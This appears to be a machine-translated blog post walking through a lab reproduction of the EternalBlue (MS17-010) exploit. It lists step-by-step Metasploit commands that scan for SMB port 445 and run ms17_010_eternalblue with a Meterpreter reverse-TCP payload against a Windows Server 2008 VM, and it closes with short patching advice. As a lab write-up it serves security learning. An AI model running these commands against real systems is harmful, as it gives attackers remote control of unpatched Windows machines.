当前位置:网站首页>Eternal blue bug reappears
Eternal blue bug reappears
2022-07-31 05:53:00 【not used to having you】
Foreword
Eternal Blue refers to the evening of April 14, 2017, the hacker group Shadow Brokers (Shadow Brokers) announced a large number of network attack tools, including "Eternal Blue" tools, "Eternal Blue" using Windows systemSMB vulnerabilities can obtain the highest privileges of the system.On May 12, criminals created the wantancry ransomware by transforming "Eternal Blue", UK, Russia, the entire Europe and many domestic university intranets, large enterprise intranets and government agency private networks were recruited, and were extorted to pay high ransoms to decrypt and restore files.
Principle analysis:
Use the scanning module and attack module in ms17-010 to firstly judge whether there is an EternalBlue vulnerability through the scanning module, and then use the attack module to attack.
Tips: The following is the text of this article, and the following cases are for reference
I. Preliminary preparations
1. Install the kali system in the virtual machine.(host ip is192.168.85.131)
2. Windows sever 2008 r2 is installed.(target machine ip is 192.168.132)
3. Make sure that port 445 has been opened on the target machine.
Second, detailed steps
1. Scanning module
a. Use nmap -Pn 192.168.85.132 to scan whether the target machine has port 445 open.
b. After confirming that it is turned on, enter use auxiliary/scanner/smb/smb_version to enter scan mode, and then show options
c. Now see Required, if there is yes, you need to set it yourself.
d.RHOSTS represents the target machine, enter set RHOSTS 192.168.85.132, and then show options to see if it is set.
e. Enter run to scan to see if there is an Eternal Blue vulnerability.(The following display indicates that the host is vulnerable)
2. Attack module
a. Enter use exploit/windows/smb/ms17_010_eternalblue to open the attack module.(Specially note that the previous ones have been changed, the auxiliary scanning module is above, and the exploit attack module is below)
b. Then show options to view the settings inside. Where there is yes, it means that we need to set it.
c. Carefully observe, there are two modules on it:
Module options (exploit/windows/smb/ms17_010_eternalblue)
Payload options (windows/x64/meterpreter/reverse_tcp)
d. We need to set the above RHOSTS, set it as the ip192.168.85.132 of the target machine, and then pass the
use windows/x64/meterpreter/reverse_tcp Convert to the second module to modify the LHOST host ip and LPORT port, do not conflict with the local port port.Then show options to see the results.
e. Finally, convert the payload into an exploit attack module through use exploit/windows/smb/ms17_010_eternalblue.Finally, enter exploit to attack.
f. The appearance of meterpreter proves that you have successfully practiced the EternalBlue vulnerability.Enter sysinfo to view the target host information.
3. Supplementary knowledge
a. Enter info after entering the attack module to view the vulnerability information.
b. Enter show targets to view the attackable system platforms.
Preventing the EternalBlue vulnerability
1. Update the latest system patch
2. Use cloud services to back up data
3. Blocking ports
边栏推荐
- gin框架学习-Casbin入门指南(ACL、RBAC、域内RBAC模型)
- let和const命令
- NFTs: The Heart of Digital Ownership
- C language tutorial (2) - printf and data types that come with c
- [Ubuntu20.04 installs MySQL and MySQL-workbench visualization tool]
- 联盟链的真实场景在哪里
- Regular Expression Basics
- Linux中mysql密码修改方法(亲测可用)
- What is an EVM Compatible Chain?
- 继承、Super,重写、抽象类、抽象方法 1(第七天)
猜你喜欢
03 【数据代理 事件处理】
Digital twins will be an important way to enter the "metaverse"
05 【绑定样式 条件渲染 列表渲染】
数字取证autopsy工具用法
Error: Cannot find module ‘D:\Application\nodejs\node_modules\npm\bin\npm-cli.js‘
Redis 事务学习有感
带你搞懂MySQL隔离级别,两个事务同时操作同一行数据会怎样?
uni-app进阶之自定义【day13】
08 【生命周期 组件】
(Crypto essential dry goods) Detailed analysis of the current NFT trading markets
随机推荐
2021面经-拥抱变化
工件SSMwar exploded 部署工件时出错。请参阅服务器日志了解详细信息
vulhub靶场学习日记hackme2
wpf wrapPanel居中并从左到右排列
代码执行漏洞
leetcode-829. 连续整数求和(数论)
PAT_乙级_真题练习_1007_素数对猜想
11 【组件通信】
gin框架学习-Gin框架和Gorm框架搭建一个简单的API微服务
vulhub靶场学习日记xxe-lab
常见JVM面试题及答案整理
梳理一下自己常用的快捷键
Error: Cannot find module 'D:\Application\nodejs\node_modules\npm\bin\npm-cli.js'
Fragmented NFT (Fractional NFT)
leetcode-每日一题731. 我的日程安排表 II
第7章 网络层第1次练习题答案(第三版)
【windows】--- SQL Server 2008 超详细安装教程
三子棋讲解(C语言)
16 【打包上线 图片懒加载】
C language tutorial (3) - if and loop